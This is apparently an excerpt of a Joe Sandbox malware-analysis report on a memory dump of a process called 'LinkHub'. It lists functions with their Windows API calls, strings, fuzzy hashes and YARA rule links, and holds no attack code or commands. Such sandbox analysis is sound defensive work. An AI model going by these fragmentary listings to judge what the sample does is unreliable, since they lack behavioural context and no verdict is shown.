VariantClear.OLEAUT32(?), ref: 00E54393

Strings

NULL Pointer assignment, xrefs: 00E5427B
Invalid parameter, xrefs: 00E542C2
Failed to create object, xrefs: 00E54241, 00E542F7

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: a420bd4c47fdfb3c21a10d79e93efc06d7a461365fc9d8cc06216f87ec9e6545
Instruction ID: c17c19928c66eaa11b528920bdffc2bf830811d36fc9ef2125586842d6f23b66
Opcode Fuzzy Hash: a420bd4c47fdfb3c21a10d79e93efc06d7a461365fc9d8cc06216f87ec9e6545
Instruction Fuzzy Hash: 4761C2B5608311DFC310DF65D889B5EBBE4EF49719F001909F985AB2A1C770ED88CBA2

Function 00E48BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00E48C9C
SystemTimeToFileTime.KERNEL32(?,?), ref: 00E48CAC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00E48CB8
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E48D55
SetCurrentDirectoryW.KERNEL32(?), ref: 00E48D69
SetCurrentDirectoryW.KERNEL32(?), ref: 00E48D9B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00E48DD1
SetCurrentDirectoryW.KERNEL32(?), ref: 00E48DDA

Strings

*.*, xrefs: 00E48DE0

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: cd9a7716dffe5db284cefafc6c3a89bd5bfe6699689e72ccfbf5f296caf176b9
Instruction ID: dfa7792f7542180444ccb7b98fd6a81cbec45f977c431cbf31533ba9e09b7c82
Opcode Fuzzy Hash: cd9a7716dffe5db284cefafc6c3a89bd5bfe6699689e72ccfbf5f296caf176b9
Instruction Fuzzy Hash: 44616B729043059FCB10EF60D9849AFB3E8FF89314F04491EF989A7251DB31E945CBA2

Function 00DEFBC6 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00E139E2,00000004,00000000,00000000), ref: 00DEFC41
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00E139E2,00000004,00000000,00000000), ref: 00E2FC15
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00E139E2,00000004,00000000,00000000), ref: 00E2FC98

Strings

(, xrefs: 00E2FBC0

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ShowWindow
String ID: (
API String ID: 1268545403-2063206799
Opcode ID: b4374954c419307e11ec010acca706f2298839b3c120849dfd803379ba7a2605
Instruction ID: a6b36f1350af8c31f33fe05e6f30f4d7a7034cb5e4c5eaeaf81ae7ccac1133bc
Opcode Fuzzy Hash: b4374954c419307e11ec010acca706f2298839b3c120849dfd803379ba7a2605
Instruction Fuzzy Hash: D7414D306083CC9EC735AB3BDDC876A7BA1AB46354F78553CE98766960C671E444C731

Function 00E646E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00E64715
SetMenu.USER32(?,00000000), ref: 00E64724
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E647AC
IsMenu.USER32(?), ref: 00E647C0
CreatePopupMenu.USER32 ref: 00E647CA
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E647F7
DrawMenuBar.USER32 ref: 00E647FF

Strings

0, xrefs: 00E646F0
F, xrefs: 00E647EA

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 86fea30f2a7c9c1949a65404615f1082160c0cdbf1ee7819bd8734b416625ea8
Instruction ID: 8619aa76870f5eb563fca4f89153e23ce9078b45620d24f86a52a74bf1b1792a
Opcode Fuzzy Hash: 86fea30f2a7c9c1949a65404615f1082160c0cdbf1ee7819bd8734b416625ea8
Instruction Fuzzy Hash: 7D417CB5A01209EFDB14CF65E844EAA7BB6FF49354F144029FA46A7390C770A914CB50

Function 00E3282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DDB329: _wcslen.LIBCMT ref: 00DDB333

Part of subcall function 00E345FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E34620

SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00E328B1
GetDlgCtrlID.USER32 ref: 00E328BC
GetParent.USER32 ref: 00E328D8
SendMessageW.USER32(00000000,?,00000111,?), ref: 00E328DB
GetDlgCtrlID.USER32(?), ref: 00E328E4
GetParent.USER32(?), ref: 00E328F8
SendMessageW.USER32(00000000,?,00000111,?), ref: 00E328FB

Strings

ComboBox, xrefs: 00E32839
ListBox, xrefs: 00E3286E

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: e96296234c391e28ea0c326f622f4582599e407c8f2aff4cc31b2cb1d68e715e
Instruction ID: bab86ddf504a1280d6f652bd3e95831774f59b99ca9b4c4e3aee0e0c79630058
Opcode Fuzzy Hash: e96296234c391e28ea0c326f622f4582599e407c8f2aff4cc31b2cb1d68e715e
Instruction Fuzzy Hash: 8421B0B5E00118BFCF01ABA0DC89EEEBBA4EF05364F40415AF951A7291DB755818DA60

Function 00E3290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DDB329: _wcslen.LIBCMT ref: 00DDB333

Part of subcall function 00E345FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E34620

SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00E32990
GetDlgCtrlID.USER32 ref: 00E3299B
GetParent.USER32 ref: 00E329B7
SendMessageW.USER32(00000000,?,00000111,?), ref: 00E329BA
GetDlgCtrlID.USER32(?), ref: 00E329C3
GetParent.USER32(?), ref: 00E329D7
SendMessageW.USER32(00000000,?,00000111,?), ref: 00E329DA

Strings

ComboBox, xrefs: 00E3291A
ListBox, xrefs: 00E3294F

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: 8897243d4af22748b2fb3f2ee709367f31c42d4104b5bdfaff6af3305aa28bae
Instruction ID: 48f0421d3b0cf7312dd2597346b57d559451d9f440a8f5568d8da08b70ec4411
Opcode Fuzzy Hash: 8897243d4af22748b2fb3f2ee709367f31c42d4104b5bdfaff6af3305aa28bae
Instruction Fuzzy Hash: F021ACB5E00218BBCF01ABA0DC89EEEBBB8EF04354F405117F991A72A1DA755818DB60

Function 00E644BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00E64539
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00E6453C
GetWindowLongW.USER32(?,000000F0), ref: 00E64563
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E64586
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00E645FE
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00E64648
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00E64663
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00E6467E
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00E64692
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00E646AF

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: a3eaf57e9b41a290191fa64ba4a293b25d74e053b928ceabe49e6cf833dd23bd
Instruction ID: f4d9dc335b5c38efc3b30e6a8c19bfd20fe4d19b99e53ef7dcfbf3430245b5e9
Opcode Fuzzy Hash: a3eaf57e9b41a290191fa64ba4a293b25d74e053b928ceabe49e6cf833dd23bd
Instruction Fuzzy Hash: A8618AB1A40208AFDB10DFA8DC81EEE77F8EB4A744F104159FA04B72E1C774A949DB50

Function 00E3BAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00E3BB18
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00E3ABA8,?,00000001), ref: 00E3BB2C
GetWindowThreadProcessId.USER32(00000000), ref: 00E3BB33
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E3ABA8,?,00000001), ref: 00E3BB42
GetWindowThreadProcessId.USER32(?,00000000), ref: 00E3BB54
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00E3ABA8,?,00000001), ref: 00E3BB6D
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E3ABA8,?,00000001), ref: 00E3BB7F
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00E3ABA8,?,00000001), ref: 00E3BBC4
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00E3ABA8,?,00000001), ref: 00E3BBD9
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00E3ABA8,?,00000001), ref: 00E3BBE4

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: f8867635ae5594a1f60a0ea913b5a5b44b0f7270f6d49a2371653a697102c67d
Instruction ID: edb32296b40e98f99e184fb54073f874ce65e4bdbca4bf54809bcbf10009b589
Opcode Fuzzy Hash: f8867635ae5594a1f60a0ea913b5a5b44b0f7270f6d49a2371653a697102c67d
Instruction Fuzzy Hash: 373198B1A04204AFDB109B16ECC8F6ABBA9EB89356F104005FB06F71E4DBF4A844DB11

Function 00E48835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E489F2
SetCurrentDirectoryW.KERNEL32(?), ref: 00E48A06
GetFileAttributesW.KERNEL32(?), ref: 00E48A30
SetFileAttributesW.KERNEL32(?,00000000), ref: 00E48A4A
SetCurrentDirectoryW.KERNEL32(?), ref: 00E48A5C
SetCurrentDirectoryW.KERNEL32(?), ref: 00E48AA5
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00E48AF5

Strings

*.*, xrefs: 00E48AAB

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: b9ede3014c8628c4bed03c2301548186cff819147bfa8760dd13efd957eacdcd
Instruction ID: 13a04c96a6eeb7461b1e9560aed0795b4a3c26826b9ce075ae8305c221f7586c
Opcode Fuzzy Hash: b9ede3014c8628c4bed03c2301548186cff819147bfa8760dd13efd957eacdcd
Instruction Fuzzy Hash: 7481BF729086049BCB24EF14D944ABEB3E8FF88314F545C1AF989E7250DB74E944DBA2

Function 00E688F9 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00E68992
IsWindowEnabled.USER32(00000000), ref: 00E6899E
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00E68A79
SendMessageW.USER32(00000000,000000B0,?,?), ref: 00E68AAC
IsDlgButtonChecked.USER32(?,00000000), ref: 00E68AE4
GetWindowLongW.USER32(00000000,000000EC), ref: 00E68B06
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00E68B1E

Strings

(, xrefs: 00E689D5

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID: (
API String ID: 4072528602-2063206799
Opcode ID: b37e7c08d3ca54aba8241d578ad947b8e31cdbba81968dc974cc2f551293c307
Instruction ID: c5586e514e42172e58ccf515c38c7a60c6c6a5a96451eb0bc64f5e15430db50a
Opcode Fuzzy Hash: b37e7c08d3ca54aba8241d578ad947b8e31cdbba81968dc974cc2f551293c307
Instruction Fuzzy Hash: 6171F234680204AFDB21DFA5E984FFA7BB5FF49384F04265AE84577261CB31A884CB11

Function 00DD7447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00DD74D7

Part of subcall function 00DD7567: GetClientRect.USER32(?,?), ref: 00DD758D
Part of subcall function 00DD7567: GetWindowRect.USER32(?,?), ref: 00DD75CE
Part of subcall function 00DD7567: ScreenToClient.USER32(?,?), ref: 00DD75F6

GetDC.USER32 ref: 00E16083
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00E16096
SelectObject.GDI32(00000000,00000000), ref: 00E160A4
SelectObject.GDI32(00000000,00000000), ref: 00E160B9
ReleaseDC.USER32(?,00000000), ref: 00E160C1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00E16152

Strings

U, xrefs: 00E16021

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: ce2bb804b7d77f3759c3f0f28fde5bcdba5b18f1a613dfab97f026fcac122bff
Instruction ID: 6d4ab890d5d2ddd1672f6489cd173ca4eecea6341044666f75e1eeb216e0f944
Opcode Fuzzy Hash: ce2bb804b7d77f3759c3f0f28fde5bcdba5b18f1a613dfab97f026fcac122bff
Instruction Fuzzy Hash: 4D71F231600205EFCF228F64CC84AEA3BB1FF49354F1452AAED596A2A2D730DC84DB60

Function 00E4CC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E4CCB7
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E4CCDF
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00E4CD0F
GetLastError.KERNEL32 ref: 00E4CD67
SetEvent.KERNEL32(?), ref: 00E4CD7B
InternetCloseHandle.WININET(00000000), ref: 00E4CD86

Strings

, xrefs: 00E4CD00

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: c0a39e5972450668bc4127f5a2aedc72e6a20acdd2dc0662740616664c17a74f
Instruction ID: c9dc71e364d5031dcb3572a7293352cff7319a040c253626b0f80419715ee510
Opcode Fuzzy Hash: c0a39e5972450668bc4127f5a2aedc72e6a20acdd2dc0662740616664c17a74f
Instruction Fuzzy Hash: 9F31B171E05204AFD7619F62AC84AAB7BFCEB49744B20552AF446E3200D770ED089B71

Function 00E3A215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00E155AE,?,?,Bad directive syntax error,00E6DCD0,00000000,00000010,?,?), ref: 00E3A236
LoadStringW.USER32(00000000,?,00E155AE,?), ref: 00E3A23D

Part of subcall function 00DDB329: _wcslen.LIBCMT ref: 00DDB333

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00E3A301

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 00E3A26B
Line %d (File "%s"):, xrefs: 00E3A2A7
Error: , xrefs: 00E3A2CF
., xrefs: 00E3A2E7
Line %d:, xrefs: 00E3A28C

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 4a739bf7809adaeb33d60376ca9514b7de7764c01094f9e2dfa4e2b962e0dec1
Instruction ID: 9355d83f1a7c3c39bf1cdc1a627f181e2bf2e0512389427c84c7cbf3d0af4e58
Opcode Fuzzy Hash: 4a739bf7809adaeb33d60376ca9514b7de7764c01094f9e2dfa4e2b962e0dec1
Instruction Fuzzy Hash: CE216B3190430AEFCF11AB90CC0AEEE7B79FF18704F04446AF516751A2EB729658DB61

Function 00E329EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00E329F8
GetClassNameW.USER32(00000000,?,00000100), ref: 00E32A0D
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E32A9A

Strings

largeicons, xrefs: 00E32A2E
smallicons, xrefs: 00E32A62
list, xrefs: 00E32A7C
SHELLDLL_DefView, xrefs: 00E32A19
details, xrefs: 00E32A48

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: d01896de98b81b8418364f1f5f3b2c293e4b8651faa8378cc5cc4ed0399239eb
Instruction ID: ab75f9b964635eb4834add687806630f486a0bf1c5dac290df6b3904d1e4dd2c
Opcode Fuzzy Hash: d01896de98b81b8418364f1f5f3b2c293e4b8651faa8378cc5cc4ed0399239eb
Instruction Fuzzy Hash: FE11067674830BBAFA246621EC0ADAB3B9CCF14728F21501AF704F40D1FBA268008524

Function 00DD7567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00DD758D
GetWindowRect.USER32(?,?), ref: 00DD75CE
ScreenToClient.USER32(?,?), ref: 00DD75F6
GetClientRect.USER32(?,?), ref: 00DD773A
GetWindowRect.USER32(?,?), ref: 00DD775B

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 17f91389df44512369e59357145c72fed8e54b148f7459b32254a094fcbfe34f
Instruction ID: 186c4e614a7765368ace8774b6f4207ba0b8352842185fb3e64aeb6cc80c38a2
Opcode Fuzzy Hash: 17f91389df44512369e59357145c72fed8e54b148f7459b32254a094fcbfe34f
Instruction Fuzzy Hash: 83C16B39A0465AEFDB10CFA8C940BEEB7F1FF18314F14945AE895A7250E734E981DB60

Function 00E0D210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00E0D237
_free.LIBCMT ref: 00E0D2A2
_free.LIBCMT ref: 00E0D2C8
_free.LIBCMT ref: 00E0D2F1
_free.LIBCMT ref: 00E0D329
_free.LIBCMT ref: 00E0D35A
_free.LIBCMT ref: 00E0D39B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 00E0D41C
